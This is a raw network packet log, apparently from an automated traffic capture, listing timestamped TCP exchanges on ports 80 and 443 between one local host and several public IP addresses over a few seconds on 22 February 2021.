                                                                                                                                                Feb 22, 2021 23:45:30.966428041 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:30.966487885 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:30.966530085 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:30.966676950 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:30.966731071 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:30.997107983 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:31.043351889 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.045031071 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.045242071 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:31.046606064 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:31.092359066 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.228348017 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.228384972 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.228403091 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.228421926 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.228694916 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:31.443150043 CET4993180192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.445687056 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.499556065 CET8049931104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.499675035 CET4993180192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.501960993 CET8049940104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.502691031 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.503077030 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.560911894 CET8049940104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.668314934 CET8049940104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.668448925 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.672277927 CET49932443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.675672054 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.729224920 CET44349932104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.729270935 CET44349932104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.729420900 CET49932443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.730185986 CET49932443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.732014894 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.732115030 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.732609034 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.788790941 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.788899899 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.788979053 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.789470911 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.794195890 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.845792055 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.850599051 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.964417934 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.966953039 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:31.968565941 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.024853945 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.024970055 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.025695086 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.083683968 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.083698988 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.084053040 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.085084915 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.093858004 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.143532038 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.152313948 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.289891005 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.289961100 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290011883 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290060997 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290106058 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290113926 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290137053 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290158987 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290201902 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290240049 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290255070 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290277958 CET44349942104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.290307999 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290394068 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290877104 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.290982008 CET49942443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:32.292341948 CET4993480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.295079947 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.345346928 CET8049934172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.345498085 CET4993480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.348378897 CET8049944172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.348582983 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.349935055 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.404772997 CET8049944172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.792937040 CET8049944172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.793595076 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.799875975 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.852936983 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.853141069 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.854209900 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.907480001 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.909471989 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.909610987 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.911253929 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.922586918 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:32.965626001 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:32.976998091 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728274107 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728292942 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728305101 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728318930 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728353977 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728369951 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728385925 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728393078 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.728399038 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.728436947 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.728482962 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.728954077 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.728991985 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.761940002 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.761965990 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.762028933 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.762058020 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.762245893 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.762264967 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.762320995 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.762466908 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.762912035 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.762936115 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.763014078 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.764236927 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.764264107 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.764334917 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.765511990 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.765536070 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.765628099 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.766786098 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.766808033 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.766860962 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.766880035 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.768018007 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.768038988 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.768122911 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.769306898 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.769328117 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.769427061 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.770555973 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.770576954 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.770652056 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.771817923 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.771843910 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.771907091 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.773101091 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.773148060 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.773183107 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.773245096 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.782197952 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.782221079 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.782330036 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.782820940 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.782840014 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.782943964 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.784082890 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.784100056 CET44349945172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.784190893 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.784225941 CET49945443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:33.839951992 CET4993680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.842091084 CET4994780192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.911155939 CET80499365.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.911326885 CET4993680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.913151026 CET80499475.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.913341999 CET4994780192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.914396048 CET4994780192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.985373020 CET80499475.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.985619068 CET80499475.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:33.985749960 CET4994780192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:33.992602110 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.063575983 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.063663960 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.064177036 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.135093927 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.135159969 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.135256052 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.135591984 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.137689114 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.208709955 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578404903 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578430891 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578455925 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578485012 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578507900 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578527927 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.578531027 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578552008 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.578563929 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.578591108 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.578916073 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.581785917 CET4993880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.583245993 CET4995080192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.650917053 CET443499485.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.651303053 CET49948443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:34.748867035 CET8049938192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.749002934 CET4993880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.753740072 CET8049950192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.753885031 CET4995080192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.754955053 CET4995080192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.924356937 CET8049950192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.924387932 CET8049950192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.924485922 CET4995080192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:34.927665949 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:34.928842068 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:34.969798088 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.971213102 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:34.971669912 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:34.973280907 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.975404978 CET44349939216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.977900982 CET49939443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.012432098 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.023036957 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.023065090 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.023077965 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.026916027 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.026933908 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.032648087 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.079256058 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.082336903 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.083895922 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.086524963 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.134279966 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.275948048 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.275966883 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.275984049 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.275995016 CET44349951216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.276177883 CET49951443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:35.510130882 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.513015985 CET4995280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.566800117 CET8049940104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.567020893 CET4994080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.569494009 CET8049952104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.569658995 CET4995280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.570074081 CET4995280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.628180027 CET8049952104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.737271070 CET8049952104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.737509966 CET4995280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.742157936 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.744338989 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.798882961 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.798947096 CET44349941104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.799046993 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.799094915 CET49941443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.800713062 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.800879955 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.802870989 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.859167099 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.859211922 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.859333992 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.860160112 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.870795965 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:35.918077946 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.927201033 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.038129091 CET44349953104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.038245916 CET49953443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:36.048228979 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.106493950 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.106622934 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.107184887 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.163517952 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.163587093 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.163731098 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.164597034 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.173674107 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.221023083 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.229871988 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344533920 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344579935 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344629049 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344670057 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344723940 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344762087 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344773054 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.344794989 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344832897 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344872952 CET44349954104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.344902992 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.344961882 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.345496893 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.345552921 CET49954443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:36.350502014 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:36.353019953 CET4995580192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:36.406172037 CET8049944172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.406317949 CET4994480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:36.416486025 CET8049955172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:36.416649103 CET4995580192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:36.417643070 CET4995580192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:36.479218006 CET8049955172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.004746914 CET8049955172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.004939079 CET4995580192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.016369104 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.063558102 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.063769102 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.064729929 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.111880064 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.121135950 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.121304035 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.122200966 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.136075974 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.169332027 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.183207989 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761485100 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761522055 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761559963 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761586905 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761595964 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.761616945 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761620045 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.761650085 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761662006 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.761679888 CET44349956172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:37.761698961 CET49956443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:37.761703014 CET44349956172.67.204.156192.168.2.6
